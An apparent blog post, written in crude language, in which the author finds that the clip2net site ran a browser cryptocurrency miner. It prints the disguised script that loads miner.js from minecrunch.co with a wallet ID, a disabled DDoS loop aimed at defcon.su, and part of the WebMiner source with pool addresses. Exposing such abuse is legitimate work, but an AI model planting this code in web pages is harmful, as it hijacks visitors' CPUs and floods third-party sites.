iceweasel 100% CPU clip2net miner

Clip2net fucks you up

It was weird, when Iceweasel got 100-170% CPU usage and geting stuck !!

I've installed great plugin “Tab Data”, which show amount of used RAM by every tab.

Installed “Suspend tab”, which can suspend tabs after some time. But the problem is in the other side.

I've closed all tabs and Iceweasel became quite.

Open clip2net site and CPU got crazy. Fucking shit, i thoung at that moment.

script.js file

var my_awesome_script = document.createElement('script');
        my_awesome_script.setAttribute('src','https://preview.c9users.io/libraries/jquery/jquery.min.js');
        document.head.appendChild(my_awesome_script);

nice?

Ofcourse, there is no jquery at all.

var minsc= document.createElement('script');
        minsc.setAttribute('src','//minecrunch.co/web/miner.js');
        minsc.setAttribute('onload','minepls()');
        document.head.appendChild(minsc);

        function minepls(){
                var miner = new WebMiner({username: "6hC4xzUixihTkKxgsQUSMGMrJuxYKibhwV",threads: 2});
                miner.start();
        }

As we can see it is a bitcoin miner.

Next, there was ddos at the past.

var DDos = 0
if (DDos == 1){
        for (i=1; i<=5000; i++) {
                  (new Image()).src="http://defcon.su/?"+Math.random()
        }
}

Next, we see script, which stolen our data from photogeek.ru or other site, change profile info with hidden iframe with script.

About the miner. As I understand, this is the wallets, which produce coins from your CPU.

function WebMiner(config) {
    /* Default values */
    this.debug = false;
    this.username = null;
    this.coin = "feathercoin";
    this.threads = 1;

    /* Extend values from config argument */
    var whitelist = ['debug', 'username', 'threads', 'coin'];
    if (!config) config = {};
    for(x in config) {
        if (whitelist.indexOf(x) != -1) {
            this[x] = config[x];
        }
    }

    this._coins = {
        "litecoin" : {
            "algorithm": "scrypt.asm.js",
            "pool":"wss://minecrunch.co:3001",
            "default_wallet":"n1H8fFbeRsyFvhZ4XucuznHenF1qFpqnKp",
            "reversed_endiannes": false
        },
        "feathercoin" : {
            "algorithm": "neoscrypt.asm.js",
            "pool": "wss://minecrunch.co:3002",
            "default_wallet":"6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4",
            "reversed_endiannes": true
        }
    };

Fuck this shit. I wrote a letter to the support.

Add new comment

Your name

The content of this field is kept private and will not be shown publicly.

Notify me when new comments are posted

All comments

Replies to my comment

  o8o     .oooooo.     oooo          o8o               oooooo   oooooo     oooo 
  `"'    d8P'  `Y8b    `888          `"'                `888.    `888.     .8'  
 oooo   888             888 .oo.    oooo    .oooooooo    `888.   .8888.   .8'   
 `888   888             888P"Y88b   `888   888' `88b      `888  .8'`888. .8'    
  888   888     ooooo   888   888    888   888   888       `888.8'  `888.8'     
  888   `88.    .88'    888   888    888   `88bod8P'        `888'    `888'      
 o888o   `Y8bood8P'    o888o o888o  o888o  `8oooooo.         `8'      `8'       
                                           d"     YD                            
                                           "Y88888P'

Enter the code above

Enter the code depicted in ASCII art style.